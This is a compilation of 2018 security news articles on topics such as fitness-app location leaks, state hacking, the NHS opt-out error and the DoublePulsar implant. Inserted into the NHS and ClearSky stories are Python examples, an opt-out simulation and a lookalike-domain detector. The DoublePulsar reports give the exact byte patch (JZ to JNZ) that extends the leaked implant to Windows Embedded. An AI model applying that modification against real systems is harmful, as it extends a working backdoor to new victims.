"The survey shows that the interest and promise of the cloud is well recognized, but the DoD would benefit from the lessons being learned right now by large private enterprises going through the same processes," Ken Spinner, VP of field engineering at Varonis told SecurityWeek. "Private industry, which is often recognized for its agility and embrace of new technologies, still largely works with a hybrid mix of cloud and on-premises systems and storage."

"One thing is certain," agrees Rick Moy, head of marketing at Acalvio: "hybrid networks, or cloud and on-premises." Both agree that adoption of JEDI -- or any other cloud solution -- will present the DoD organizations with both challenges and opportunities.

"There’s no easy button and the cloud is not without risks," says Spinner. "Another concern, and perhaps the weakest link, are the defense contractors that access confidential intelligence as part of their daily workload. It’s far too tempting for a few bad actors to breach a system and attempt to steal data -- the cloud needs to be protected just like on-premises systems and data. Another challenge will be to ensure that the security capabilities people currently have with on-prem solutions are available and tested with both pure cloud solutions and hybrid solutions."

But Moy adds the possibility of 'starting over'. “I would argue that a move to cloud represents a fresh opportunity to build in better security and advanced monitoring capabilities," he told SecurityWeek: "ones that we may have overlooked in on-premises deployments. For instance, unified policy, access controls, deception, logging and monitoring, and so on."

The JEDI project shows that the DoD hierarchy is already set on a cloud future; and the Meritalk survey shows that individual DoD IT managers are ready for the challenge. "As DoD knows," concludes the Meritalk report, "cloud isn’t the final destination -- but it sets the foundation for necessary innovation, collaboration, and next-generation technologies like big data analytics, shared services, AI, and electronic warfare. Agencies must keep their eyes on the future and consider cloud in terms of broader IT modernization efforts government-wide."

Fitness App Revealed Data on Military, Intelligence Personnel
12.7.18 securityweek  BigBrothers

Mobile fitness app Polar has suspended its location tracking feature after security researchers found it had revealed sensitive data on military and intelligence personnel from 69 countries.

The revelation about the Finnish-based Polar Flow app comes months after another health app, Strava, was found to have shown potentially sensitive information about US and allied forces around the world.

Security researchers in the Netherlands said Sunday they were able to find data on some 6,000 individuals including military personnel from dozens of countries and employees of the FBI and National Security Agency.

The disclosure illustrates the potential security risks of using fitness apps which can track a person's location, and which may be "scraped" for espionage.

"With only a few clicks, a high-ranking officer of an airbase known to host nuclear weapons can be found jogging across the compound in the morning," security researcher Foeke Postma said in a blog post Sunday after an investigation with the Dutch news organization De Correspondent.

"We can find Western military personnel in Afghanistan through the Polar site. Cross-checking one name and profile picture with social media confirmed one soldier or officer's identity."

The investigation found detailed personal information, including home addresses, of military personnel, persons serving on submarines, Americans in the Green Zone in Baghdad and Russian soldiers in Crimea, the researchers said.

Polar said in a statement it was suspending the app's feature that allowed users to share data, while noting that any data made public was the result of users who opted in to location tracking.

"It is important to understand that Polar has not leaked any data, and there has been no breach of private data," the statement said.

It said the location tracking feature "is used by thousands of athletes daily all over the world to share and celebrate amazing training sessions."

According to De Correspondent, only about two percent of Polar users chose to share their data, but that nonetheless allowed anyone to discover potentially sensitive data from military or civilian personnel.

"We found the names and addresses of personnel at military bases including Guantanamo Bay in Cuba, Arbil in Iraq, Gao in Mali, and bases in Afghanistan, Saudi Arabia, Qatar, Chad, and South Korea," the report said.

In January, the Pentagon said it was reviewing its policies on military personnel's use of fitness applications after Strava's map showed a series of military bases in Iraq as well as sites in Afghanistan.

Polar fitness app broadcasted sensitive data of intelligence and military personnel
11.7.18 securityaffairs BigBrothers

The mobile fitness app Polar has suspended its location tracking feature due to the leakage of sensitive data on military and intelligence personnel.
A new privacy incident involves a fitness application and the military: this time the mobile fitness app Polar has suspended its location tracking feature due to the leakage of sensitive data on military and intelligence personnel from 69 countries.

This is the second incident in a few months: in January, experts discovered that military personnel worldwide had publicly shared online their exercise routes recorded through the fitness tracker Strava, revealing fitness sessions conducted inside or near military bases.

During the weekend, Dutch security experts revealed they were able to find data on some 6,000 individuals including military personnel from dozens of countries and FBI and National Security Agency personnel.

According to an investigation by the news website Bellingcat and the Dutch news agency De Correspondent, the fitness devices were leaking data belonging to military or intelligence officials, data that could be exploited by threat actors to spy on them.

“With only a few clicks, a high-ranking officer of an airbase known to host nuclear weapons can be found jogging across the compound in the morning,” explained the security researcher Foeke Postma, who investigated the case with the Dutch news outlet De Correspondent.

“We can find Western military personnel in Afghanistan through the Polar site. Cross-checking one name and profile picture with social media confirmed one soldier or officer’s identity.”


The experts discovered detailed personal information, including home addresses, of military personnel, persons serving on submarines, Americans in the Green Zone in Baghdad and Russian soldiers in Crimea.

The exposure of such data poses serious risks to the military personnel as reported in a post published by Defensenews.com.

“Bellingcat was able to pinpoint the name of a “high-ranking officer” at a base known to host nuclear weapons. It took just a few clicks. Using the Polar Flow app and other information found on the internet, De Correspondent was able to collect a disturbing amount of one Dutch soldier’s personal information.” reads the blog post published by Defensenews.com.

“They found the name of the soldier, the fact he was stationed at one of the key locations where the war against the Islamic State is being waged from, the soldier’s home address, and the names of his wife and kids.”

In response to the privacy incident, Polar has disabled the feature that allowed users to share data and pointed out that any data made public was the result of users who opted in to location tracking.

The company has already implemented a number of measures to mitigate the exposure of its users, along with the suspension of the Flow Explore feature until further notice.

The location tracking feature allows thousands of athletes all over the world to share data related to their training sessions every day.

“If there hasn’t been a data breach, why have you suspended the Explore feature?

While the decision to opt-in and share training sessions and GPS location data is the choice and responsibility of the customer, we are aware that potentially sensitive locations were appearing in public data, and have made the decision to suspend the Explore until further notice.” reads the statement published by Polar.

“I have seen statements that suggest that Polar leaked data – Did Polar leak any data?

Contrary to what has been reported—it’s important to clarify that Polar has not leaked any data. Furthermore, there has been no breach of private data.”

The De Correspondent investigation revealed that only about two percent of Polar users chose to share their data, but journalists and experts were still able to collect sensitive data on military and civilian personnel.

“We found the names and addresses of personnel at military bases including Guantanamo Bay in Cuba, Arbil in Iraq, Gao in Mali, and bases in Afghanistan, Saudi Arabia, Qatar, Chad, and South Korea,” states the De Correspondent report.

Chinese hackers breached systems at Australian National University … and are still there
6.7.18 securityaffairs BigBrothers

Chinese hackers breached the systems of Australian National University (ANU) and, according to experts, they are still there.
Chinese hackers continue to target organizations worldwide; this time, attackers based in China breached the systems of Australian National University (ANU), one of the most prestigious Australian universities.

The bad news is that experts are still working to lock the hackers out, because the threat is still active on the university's network.

“The ABC has been told the Australian National University (ANU) system was first compromised last year.” reported the ABC news.

The ANU had been working with intelligence agencies for several months to contain the threat and minimize its impact.

“The university has been working in partnership with Australian government agencies for several months to minimise the impact of this threat, and we continue to seek and take advice from Australian government agencies,” reads the official statement published by the Australian National University.

“Current assessments indicate no staff, student or research information has been taken and counter-measures are being undertaken.”


The Cyber Security Minister Angus Taylor pointed out that the Australian Government “condemns any malicious activity” that targets the systems of the country.

“We know that nation states and criminal groups actively target research and tertiary institutions to steal the intellectual property of hardworking Australians,” he said.

“Malicious cyber activity against Australia’s national interests, whether from criminal syndicates or foreign states, is increasing in frequency, sophistication and severity, and the Australian Government’s highest priority is ensuring Australians are safe and our interests are secure.”

Mr Taylor confirmed that the Australian Cyber Security Centre (ACSC) had been supporting ANU in this case.

“The Australian Cyber Security Centre works closely with any affected organisations to reduce the likelihood of threat actors being successful and to help them recover when they are compromised,” he said.

Australian systems are frequently targeted: in October 2016 a report published by the Australian Cyber Security Centre confirmed that the Australian Bureau of Meteorology hack was carried out by foreign cyber spies.

In December 2015 the Australian Broadcasting Corporation (ABC) revealed that a supercomputer operated by the Australian Bureau of Meteorology (BoM) had been hit by a cyber attack. The Bureau of Meteorology is Australia’s national weather, climate, and water agency, the analog of the US National Weather Service.

The BoM supercomputer targeted by the hackers is also used to provide weather data to defense agencies, so compromising it could give a persistent attacker a significant advantage for numerous reasons.

Initial media reports blamed China for the cyber attack; in 2013 Chinese hackers had been accused by authorities of stealing top-secret documents and plans for Australia’s new intelligence agency headquarters.

Hamas cyber-operatives lure Israeli soldiers to spyware hidden in tainted apps

6.7.18 securityaffairs BigBrothers

Israeli military intelligence accused Hamas operatives of creating tainted apps to lure soldiers into downloading spyware onto their phones.
According to a report published by the Israeli military, Hamas hackers are attempting to lure Israel Defence Forces (IDF) soldiers into installing tainted apps on their devices.

The Israeli military has already blamed Hamas for similar attacks, but this time the hackers managed to serve the apps through the official Google Play Store to increase the likelihood of success.

The experts from the Israeli firm ClearSky have identified the following apps:

WinkChat – com.winkchat.apk (dating app)
GlanceLove – com.coder.glancelove.apk (dating app)
Golden Cup – anew.football.cup.world.com.worldcup.apk (World Cup app)

Hamas operatives created a number of fake Facebook profiles using photos of attractive women to lure IDF soldiers into private conversations, then trick them into installing one of the compromised apps.

Israeli military officials explained that Hamas operatives adopted the same tactic in a campaign launched in January.

In January the hackers used the profile of a woman named “Elianna Amer”; in the latest attacks, which lasted at least three months, they used the profile of a woman named “Lina Kramer.”

“I got a message on Facebook that looked innocent at first, from someone named Lina Kramer, we started talking on Facebook, then we moved to Whatsapp, and then she asked me to download an app called GlanceLove,” explained a former IDF soldier.

“At this stage, my suspicion was final, and I decided to consult a friend who helped me understand that it was a fictitious profile with malicious intentions. From there I turned to the information security officer in my unit who helped me.”

According to Israeli army intelligence officers, the attacks failed to damage military security.

“No damage was done, as we stopped it in time,” one of the officers said.

The Israeli newspaper Haaretz provided a different account of the facts, reporting that at least “hundreds” of soldiers were infected.

“Hamas managed to hack into the phones of hundreds of Israeli soldiers using dating and World Cup apps and managed to gather sensitive information about the military and some of its bases around the Gaza strip.” reported Haaretz.

“The apps allowed malicious software controlled by Hamas to be planted into Android smartphones, enabling militants in the Strip to access pictures, phone numbers and email addresses of soldiers posted close to the border, and even allowed Hamas to control the phones’ cameras and microphones remotely.”

The analysis of the apps revealed they were tainted with spyware that can take over devices and exfiltrate sensitive data.

According to the experts, the threat actor behind these attacks is codenamed Arid Viper.

In 2015, security experts at Trend Micro uncovered a cyber espionage campaign, dubbed Operation Arid Viper, that targeted Israeli institutions. Operation Arid Viper was run by Arabic-speaking hackers who sought to extract sensitive documents by sending phishing emails. The phishing campaigns targeted government offices, infrastructure providers, a military organization, and academic institutions in Israel and Kuwait.

In the past, security experts linked Hamas operatives to another APT tracked as Gaza Cybergang (Gaza Hackers Team or Molerats).

NHS Digital Erroneously Reveals Data of 150,000 Patients
5.7.18 securityweek BigBrothers

On Monday July 2, Jackie Doyle-Price, the parliamentary under-secretary of state for health, delivered a written statement to the UK parliament. It explained that 150,000 NHS patients who had specifically opted out of the NHS patient data-sharing regime were in fact not opted out.

"As a result," says the statement, "these objections were not upheld by NHS Digital in its data disseminations between April 2016, when the NHS Digital process for enabling them to be upheld was introduced, and 26 June 2018. This means that data for these patients has been used in clinical audit and research that helps drive improvements in outcomes for patients."

NHS Digital is the national information and technology partner to the health and social care system. It has responsibility for standardizing, collecting and publishing data and information from across the health and social care system in England. It is therefore responsible for storing and disseminating NHS patient data to those qualified to receive it.

On the same day, NHS Digital released its own statement. "We apologize unreservedly for this issue, which has been caused by a coding error by a GP system supplier (TPP) and means that some people's data preferences have not been upheld when we have disseminated data. The TPP coding error meant that we did not receive these preferences and so have not been able to apply them to our data."

It seems that a software error in an application named SystmOne, written by software firm TPP and designed to allow patients to opt out of data sharing at their local NHS surgery, failed to record the objections. Those objections were therefore not relayed to NHS Digital. Since the system relies on patients opting out rather than opting in to data sharing, NHS Digital assumed that all patients had agreed.

The software error was detected on 28 June, three years after SystmOne was released, when TPP switched to a new system. Neither Jackie Doyle-Price nor NHS Digital has given figures on how many times this data might have been erroneously shared externally during this period. However, NHS Digital compiles and publishes a register of organizations that receive patient data. The most recent publication (XLS) covers the period from December 2017 to February 2018. It shows that patient data was shared more than 5,300 times in these three months.

It also shows where the data shared is considered to be sensitive or non-sensitive, and whether the data was anonymized or is identifiable. The anonymization is performed in accordance with the UK data protection regulator's requirements; but many privacy activists do not believe that anonymization is irreversible.

"As part of our commitment to the secure and safe handling of health data, on 25 May 2018 [the date on which GDPR became required] the Government introduced the new national data opt-out. The national data opt-out replaces Type 2 objections. This has simplified the process of registering an objection to data sharing for uses beyond an individual's care. The new arrangements give patients direct control over setting their own preferences for the secondary use of their data and do not require the use of GP systems, and therefore will prevent a repeat of this kind of GP systems failure in the future."

It remains an opt-out of data sharing rather than an opt-in to data sharing -- the latter being generally required by GDPR.
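The failure described above is a default-policy problem rather than a leak in the usual sense: an objection that never reached the registry was read as agreement. The following is an added example, not NHS Digital's or TPP's code, that models the same pipeline in Python on constructed sample records. Under an opt-out default a patient whose objection was lost is released; under a fail-closed (opt-in) default the same record is held back as unresolved; and a control-total check surfaces a shortfall between the objections a supplier says it holds and those the registry received, which catches loss in transit (it cannot catch a supplier that never recorded the objection in the first place, which is why an independent channel such as the national opt-out matters). The names Pref, Policy, parse_preference_feed and objection_shortfall, and the feed format, are assumptions made for the illustration.

```python
from dataclasses import dataclass
from enum import Enum
from typing import Dict, Iterable, Sequence, Tuple


class Pref(Enum):
    SHARE = "share"    # no objection on record / positive choice recorded
    OBJECT = "object"  # patient objected to secondary use of their data


class Policy(Enum):
    OPT_OUT = "opt-out"  # release unless an objection is on file (the GP-system model described above)
    OPT_IN = "opt-in"    # release only with an explicit preference on file; silence withholds


@dataclass(frozen=True)
class Decision:
    released: Tuple[str, ...]
    withheld: Tuple[str, ...]
    unresolved: Tuple[str, ...]  # patients with no preference record at all


def parse_preference_feed(lines: Iterable[str]) -> Dict[str, Pref]:
    """Parse 'patient_id,preference' lines from a constructed GP-system export.
    An unknown preference code raises rather than being skipped: a silently
    dropped objection is exactly how opt-outs go missing."""
    prefs: Dict[str, Pref] = {}
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        pid, sep, code = line.partition(",")
        if not sep:
            raise ValueError(f"malformed record: {line!r}")
        code = code.strip().lower()
        if code not in {p.value for p in Pref}:
            raise ValueError(f"unrecognised preference {code!r} for {pid.strip()!r}")
        prefs[pid.strip()] = Pref(code)
    return prefs


def select_for_dissemination(patients: Sequence[str], prefs: Dict[str, Pref], policy: Policy) -> Decision:
    """Decide which patient records may leave the registry under `policy`."""
    released, withheld, unresolved = [], [], []
    for pid in patients:
        pref = prefs.get(pid)
        if pref is Pref.OBJECT:
            withheld.append(pid)
        elif pref is Pref.SHARE:
            released.append(pid)
        elif policy is Policy.OPT_OUT:
            released.append(pid)     # dangerous default: no record is read as consent
        else:
            unresolved.append(pid)   # fail closed: no record, no release
    return Decision(tuple(released), tuple(withheld), tuple(unresolved))


def objection_shortfall(claimed_by_supplier: int, prefs: Dict[str, Pref]) -> int:
    """Control-total check: the supplier states how many objections its system
    holds; return how many fewer the registry actually received. Anything
    non-zero should halt dissemination until the gap is explained."""
    received = sum(1 for p in prefs.values() if p is Pref.OBJECT)
    return claimed_by_supplier - received


# Constructed sample. P3 objected at the surgery, but the objection never made
# it into the export, which is the lost-objection case from the article.
SAMPLE_FEED = """
# patient_id,preference  (constructed test data)
P1,share
P2,object
""".splitlines()
PATIENTS = ("P1", "P2", "P3")
SUPPLIER_CLAIMED_OBJECTIONS = 2   # what the supplier's system reports holding


def demo() -> Dict[str, Decision]:
    """Run the same feed through both policies so the difference is visible."""
    prefs = parse_preference_feed(SAMPLE_FEED)
    return {policy.value: select_for_dissemination(PATIENTS, prefs, policy) for policy in Policy}


if __name__ == "__main__":
    prefs = parse_preference_feed(SAMPLE_FEED)
    for policy_name, decision in demo().items():
        print(policy_name, decision)
    print("objection shortfall:", objection_shortfall(SUPPLIER_CLAIMED_OBJECTIONS, prefs))
```

Running the block shows P3 released under opt-out and parked as unresolved under opt-in, and a shortfall of 1 against the supplier's claimed count; the unresolved bucket is the safe place for a record until the preference is confirmed through a channel that does not depend on the failing system.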

Dr John Parry, Clinical Director at TPP, said: "TPP and NHS Digital have worked together to resolve this problem swiftly. The privacy of patient data is a key priority for TPP, and we continually make improvements to our system to ensure that patients have optimum control over information. In light of this, TPP apologizes unreservedly for its role in this issue."

NHS Digital added, "We are confident that we are now respecting all opt-outs that have been recorded in the system. We will also be contacting organizations with whom we have shared data that may have been affected, and work with them to destroy the data where possible."

In an emailed comment, Mike Smart, a security strategist at Forcepoint, told SecurityWeek, "In this case, it appears the underlying program left patient data exposed, even though each party involved in handling the data was aware of the privacy policy settings. It's a clear indicator that relying too heavily on software will cause these mistakes to happen in the future. We can't afford to leave out the human element when deciding how we protect sensitive data, and must involve creative and lateral thinking in the testing and final checking stage before software goes live."

Israel Accuses Hamas of Targeting Soldiers With World Cup App
4.7.18 securityweek BigBrothers

Tel Aviv - Israeli military intelligence on Tuesday accused Hamas hackers of creating a World Cup app and two online dating sites to tempt soldiers into downloading spyware onto their phones.

Briefing journalists at national defence headquarters in Tel Aviv, army intelligence officers said the scam by members of the Palestinian Islamist movement that runs the Gaza Strip failed to damage military security.

"No damage was done, as we stopped it in time," one of the officers said, with the military's response codenamed "Operation Broken Heart".

But he said the attempt showed the Islamist militants had adopted new tactics since a similar attempt was revealed in January 2017.

The emphasis then was solely on the dating game, with the hackers posing online as attractive young women seeking to lure men in uniform into long chats.

This time the traps were aimed at both sexes and there was the additional bait of World Cup action with an app offering "HD live streaming of games, summaries and live updates".

Attackers used stolen identities to create more convincing fake Facebook profiles of young Israelis, written in fluent Hebrew studded with current slang.

"What Hamas is bringing to the table is a very good knowledge of our young people and their state of mind," another officer said. Asked how he could be sure Hamas was behind the online offensive, he declined to say but insisted there was no doubt.

The assailants uploaded their custom-built Golden Cup, Wink Chat and Glance Love applications to the Google Store, to make them seem legitimate, according to the officers.

Using Facebook sharing and Whatsapp messages, they urged young men and women performing Israel's compulsory military service to download the infected apps.

Once on the recipient's phone, officers said, the device could be taken over to covertly take and send photographs, eavesdrop on conversations, copy stored files and pictures and transmit location details.

But in most cases, they said, soldiers did not download the apps and informed their superiors of their suspicions.

Google has since deleted the apps from its store, they added.

They said that awareness of the potential risk had soared since the army publicised the previous attempts.

"Thanks to the soldiers' vigilance, Hamas' intelligence infrastructure was exposed before it caused actual security damage," army briefing notes said. Israel and Palestinian militants in Gaza have fought three wars since 2008.

In March 2016 a Palestinian from Gaza was charged with hacking into Israeli military drones.

Iranian Hackers Impersonate Israeli Security Firm
4.7.18 securityweek BigBrothers

A group of Iranian hackers focused on cyber-espionage recently built up a website to impersonate ClearSky Cyber Security, the Israeli firm that exposed their activities not long ago.

The hackers, tracked as APT35 and also known as NewsBeef, Newscaster, and Charming Kitten, have been active since at least 2011, with their activities detailed for the first time several years ago.

In December 2017, ClearSky Cyber Security published a report detailing the group’s activities during the 2016-2017 timeframe. The security firm not only described the actor’s infrastructure, but also provided information on DownPaper, a new piece of malware the hackers had been using.

The security firm exposed the link between the group and Behzad Mesri, also known as Skote Vahshat, who was charged in November 2017 with the hacking of HBO. Furthermore, the researchers also managed to establish the identity of two other alleged members of the group.

Roughly half a year after the report was published, the security firm announced on its Twitter account that the hackers built their own site impersonating ClearSky.

“#CharmingKitten built a phishing website impersonating our company. The fake website is clearskysecurity\.net (the real website is http://clearskysec.com),” the security firm announced.

The advanced persistent threat (APT) apparently copied entire pages from the legitimate website, but also changed one of them to include a sign in option with multiple services. Anyone entering credentials there would have had them sent to the actor instead.

“These sign in options are all phishing pages that would send the victim's credentials to the attackers. Our legitimate website does not have any sign in option. It seems that the impersonating website is still being built because some of the pages have error messages in them,” the security firm announced.

One of the pages on the fake website, the security researchers discovered, featured content related to a Charming Kitten campaign that ClearSky exposed only several weeks ago. That page, however, wasn’t customized to look like the security firm’s website.

The fake website started being flagged as deceptive soon after ClearSky discovered it. The security firm says that its employees, services, and customers were not affected.
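Impersonation domains of this kind are normally caught by watching newly seen hostnames for the company's own brand token. The following is an added example, not ClearSky's tooling, that flags lookalikes of clearskysec.com in Python over a constructed list of hostnames (the kind of input a certificate transparency or newly-registered-domain feed would supply); it also accepts defanged names such as the `clearskysecurity\.net` form quoted from the tweet. The helper names, the list of generic suffix words and the one-label public-suffix model are assumptions for the illustration; a production check would consult the public-suffix list.

```python
from typing import Iterable, List, Optional, Tuple

# The genuine domain named in ClearSky's tweet.
LEGIT_DOMAIN = "clearskysec.com"

# Generic trailing words that impersonators add to or drop from a brand name.
# Assumption for this illustration, not an exhaustive list.
GENERIC_SUFFIXES = ("security", "secure", "sec", "cyber", "login", "portal")


def normalise(hostname: str) -> str:
    """Lower-case and undo common defanging ('[.]' and '\\.') so names quoted
    in threat-intel posts can be fed in directly."""
    return hostname.strip().lower().replace("[.]", ".").replace("\\.", ".").strip(".")


def registrable(hostname: str) -> Tuple[str, str]:
    """Split into (second-level label, top-level label).
    Assumption: a one-label public suffix, adequate for the .com/.net samples
    here; real code should use the public-suffix list (co.uk and friends)."""
    labels = normalise(hostname).split(".")
    if len(labels) < 2 or not all(labels):
        raise ValueError(f"not a registrable hostname: {hostname!r}")
    return labels[-2], labels[-1]


def brand_stem(hostname: str) -> str:
    """Reduce the second-level label to its brand token by stripping one
    generic suffix and any hyphens: clearskysec -> clearsky,
    clearskysecurity -> clearsky, clear-sky-sec -> clearsky."""
    sld, _ = registrable(hostname)
    for suffix in GENERIC_SUFFIXES:
        if sld.endswith(suffix) and len(sld) > len(suffix) + 2:
            sld = sld[: -len(suffix)]
            break
    return sld.replace("-", "")


def lookalike_reason(candidate: str, legit: str = LEGIT_DOMAIN) -> Optional[str]:
    """Return why `candidate` looks like an impersonation of `legit`, or None."""
    c_sld, c_tld = registrable(candidate)
    l_sld, l_tld = registrable(legit)
    if (c_sld, c_tld) == (l_sld, l_tld):
        return None  # the real domain, or one of its own subdomains
    l_stem = brand_stem(legit)
    if brand_stem(candidate) == l_stem:
        if c_sld == l_sld:
            return "same name, different TLD"
        return "brand name with altered suffix"
    if l_stem in c_sld.replace("-", ""):
        return "brand name embedded in label"
    return None


def flag_lookalikes(hostnames: Iterable[str], legit: str = LEGIT_DOMAIN) -> List[Tuple[str, str]]:
    """Run the check over a feed and keep only the hits, in input order."""
    hits = []
    for name in hostnames:
        reason = lookalike_reason(name, legit)
        if reason:
            hits.append((normalise(name), reason))
    return hits


# Constructed sample feed (not real observations): the impersonation domain
# from the article mixed with the company's own names and unrelated hosts.
SAMPLE_FEED = [
    "clearskysecurity\\.net",      # defanged form as quoted in the tweet
    "login.clearskysec.com",       # the company's own subdomain: not a hit
    "clearskysec.net",
    "example.org",
    "clear-sky-sec.net",
    "myclearskysec-support.com",
    "clearskysec.com",
]

if __name__ == "__main__":
    for host, why in flag_lookalikes(SAMPLE_FEED):
        print(f"{host:30} {why}")
```

The check deliberately treats the company's own subdomains as non-hits and reports a reason with each hit, so an analyst can triage "same name, different TLD" (often a defensive registration) differently from a brand token wrapped in unrelated words.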

Over the past years, security researchers managed to link various hacking groups to Iran, including APT33, Rocket Kitten, Magic Hound, and CopyKittens, and even revealed that they tend to share infrastructure and malware code.

NSA began deleting all call detail records (CDRs) acquired since 2015
3.7.18 securityaffairs BigBrothers

NSA is deleting hundreds of millions of records of phone calls and text messages dating back to 2015 due to technical irregularities.
The US National Security Agency announced it is deleting hundreds of millions of records of phone calls and text messages dating back to 2015 due to technical irregularities in some data received from telecommunications service providers.

“Consistent with NSA’s core values of respect for the law, accountability, integrity, and transparency we are making public notice that on May 23, 2018, NSA began deleting all call detail records (CDRs) acquired since 2015 under Title V of the Foreign Intelligence Surveillance Act (FISA)” reads the announcement published by the NSA.

“NSA is deleting the CDRs because several months ago NSA analysts noted technical irregularities in some data received from telecommunications service providers.”

Title V of the Foreign Intelligence Surveillance Act (FISA) and the USA Freedom Act of 2015 allow the intelligence agencies to collect call metadata related to certain types of calls involving persons of interest whose activity may pose a threat to homeland security.

The National Security Agency received more call detail records (CDRs) than it was allowed to retain under the current legal framework.

The NSA decided to destroy the data because it was infeasible to identify and isolate the properly produced records.

“Consequently, NSA, in consultation with the Department of Justice and the Office of the Director of National Intelligence, decided that the appropriate course of action was to delete all CDRs. NSA notified the Congressional Oversight Committees, the Privacy and Civil Liberties Oversight Board, and the Department of Justice of this decision.” continues the announcement.

The National Security Agency started to delete malformed CDRs on May 23, this year, more than a month ago.


The intelligence Agency also confirmed to have addressed the root cause of the problem for future CDR acquisitions.

The National Security Agency reported the problem to the Congressional Oversight Committees, the Privacy and Civil Liberties Oversight Board, and the Department of Justice, which notified the Foreign Intelligence Surveillance Court.

This isn’t the first incident of this kind: last year civil liberties journalist Marcy Wheeler published a catalog of all the times the National Security Agency had violated FISA since the Stellar Wind phone dragnet was brought under FISA in 2004.

Russia Expert to Lead Canada's Electronic Eavesdropping Agency
29.6.18 securityweek  BigBrothers

A Russia expert was appointed Wednesday to lead Canada's electronic eavesdropping agency, amid ongoing concerns of Russian hacking and meddling in Western elections.

Shelly Bruce moves up from number two at the Communications Security Establishment (CSE) to replace her former boss, outgoing CSE head Greta Bossenmaier.

Bruce studied Russia and Slavic languages at university before joining the CSE in 2004 as director of intelligence, and quickly moved up the ranks.

Her appointment as the head of the CSE comes only two months after Ottawa moved to safeguard Canada's elections from cyber threats and "foreign interference," following accusations of Russian meddling in the last US election, which Russia has denied.

Canada's next federal election is scheduled for 2019.

Also in April, G7 foreign ministers called on Russia to come clean about a nerve agent attack on a former spy in Britain, calling it in a joint statement "a threat to us all."

Western nations had a month prior expelled 150 Russian diplomats in a coordinated action against Moscow in support of Britain, and Russia retaliated with similar moves.

They included four diplomats serving at either Russia's embassy in Ottawa or its consulate in Montreal who were "identified as intelligence officers or individuals who have used their diplomatic status to undermine Canada's security or interfere in our democracy," Foreign Minister Chrystia Freeland said then.

Canada is a member of the US-led Five Eyes intelligence-gathering alliance.

The CSE last year urged Ottawa to step up its hacking countermeasures, after identifying between 2013 and 2015 approximately 2,500 state-sponsored hacking attempts.

Oops … the DoublePulsar NSA-linked implant now works also on Windows Embedded devices
28.6.18 securityaffairs BigBrothers

This is very bad news for the security community: the NSA-linked DoublePulsar implant can now target Windows Embedded devices.
The DoublePulsar implant was released publicly in April 2017 by the ShadowBrokers hackers, who allegedly stole it from the NSA.

The hackers leaked a huge trove of hacking tools and exploit code used by the US intelligence agency; most of the Windows exploits had been addressed by Microsoft the month before.

DoublePulsar is a sophisticated SMB backdoor that allows attackers to control infected systems; since its leak it has worked on almost any Windows system except devices running a Windows Embedded operating system.

News of the day is that a security researcher who uses the online moniker Capt. Meelo has developed a version of the DoublePulsar code that also works on devices running a Windows Embedded operating system.

The researcher discovered that even though devices running a Windows Embedded operating system are vulnerable to the exploits, the relevant Metasploit modules wouldn’t work on them.

To confirm this hypothesis, the researcher used the NSA FuzzBunch exploit code and discovered that the target device was indeed vulnerable via the EternalBlue exploit.

“I then quickly used the EternalBlue module and the result was successful – the backdoor was successfully installed on the target. So I guessed the authors of the MSF exploit modules just forgot to add the support for Windows Embedded version.” wrote the expert in a blog post.

“Since the backdoor was already installed, the last thing that needs to be done to complete the exploitation and gain a shell was to use DoublePulsar.”

In summary, the expert was able to run the EternalBlue exploit against the target device, but the deployment of the DoublePulsar backdoor was failing, so the researcher decided to analyze the implant to discover why.

What he found was that one simple line of code was enough to make it work on Windows Embedded.

DoublePulsar was designed to check the Windows version on the target machine and take one installation path on Windows 7 or another (and perform other OS checks) on other platform iterations. However, there was no check for Windows Embedded, which generated an error message.

By simply modifying an instruction in the “Windows 7 OS Check,” the researcher was able to force the implant into taking that specific installation path.

“To do this, I went to Edit > Patch program > Change byte. Then I changed the value 74 (opcode of JZ) to 75 (opcode of JNZ). I then created a DIF file by going to File > Produce file > Create DIF file,” Capt. Meelo explains.

The expert used @stalkr_’s script (https://stalkr.net/files/ida/idadif.py) to patch the modified exe file and then moved the modified Doublepulsar-1.3.1.exe back to its original location.

This trick allowed him to inject the generated DLL payload to the target host.

France Also Interested in Greece's Russian Bitcoin Suspect
28.6.18 securityweek BigBrothers

France has joined the US and Russia in seeking the extradition of a Russian held in Greece for allegedly laundering $4 billion using the bitcoin digital currency, a court source said Wednesday.

The French warrant says Alexander Vinnik, who headed bitcoin exchange BTC-e, had defrauded over 100 people in six French cities between 2016 and 2018.

He is sought for extortion, money laundering and crimes committed online, the court source said.

Vinnik has been held in jail since his arrest last July in the northern Greek tourist resort of Halkidiki. He denies the accusation.

He was indicted by a US court last year on 21 charges ranging from identity theft and facilitating drug trafficking to money laundering.

Greece's Supreme Court in December said Vinnik should be extradited to the US, but the final decision is up to the Greek justice minister.

Russia has also filed a demand to extradite Vinnik so he can stand trial on separate fraud charges.

BTC-e, founded in 2011, became one of the world's largest and most widely used digital currency exchanges.

According to the US indictment, it was "heavily reliant on criminals".

In addition, BTC-e "was noted for its role in numerous ransomware and other cyber-criminal activity".

It allegedly received more than $4 billion (3.5 billion euros) worth of Bitcoin over the course of its operation.

Vinnik was also charged with receiving funds from the infamous hack of Mt. Gox -- an earlier digital currency exchange that eventually failed, in part due to losses attributable to hacking.

The US Treasury Department has slapped BTC-e with a $110 million fine for "wilfully violating" US anti-money laundering laws. Vinnik himself has been ordered to pay $12 million.

In Russia, Vinnik is wanted on separate fraud charges totalling 9,500 euros.

He has said he would accept extradition to his home country.

NSA-Linked Implant Patched to Work on Windows Embedded
28.6.18 securityweek BigBrothers

DoublePulsar, one of the hacking tools the Shadow Brokers supposedly stole from the National Security Agency (NSA)-linked Equation Group, can now run on Windows Embedded devices.

The backdoor was released publicly in April last year along with a variety of Windows exploits that Microsoft had patched the month before. It is a sophisticated, multi-architecture SMB (Server Message Block) backdoor that can stay well hidden on infected machines.

In addition to SMB, it is also used as the primary payload in RDP (Remote Desktop Protocol) exploits in the NSA’s FuzzBunch software (an exploitation framework that resembles Rapid7’s Metasploit).

As it turns out, although it would work on a wide range of Windows releases, DoublePulsar wouldn’t work on devices running a Windows Embedded operating system, even though the platform itself is vulnerable to the NSA-linked exploits, a security researcher who uses the online handle Capt. Meelo says.

Windows Embedded, the researcher discovered, was indeed vulnerable to the exploits, but the relevant Metasploit modules wouldn’t work on it. Using FuzzBunch, however, he verified that the target device was indeed vulnerable via the EternalBlue exploit.

While exploitation via the EternalBlue module was successful, the installation of DoublePulsar failed, so the researcher decided to analyze the implant to discover why.

What he found was that one simple line of code was enough to make it work on Windows Embedded.

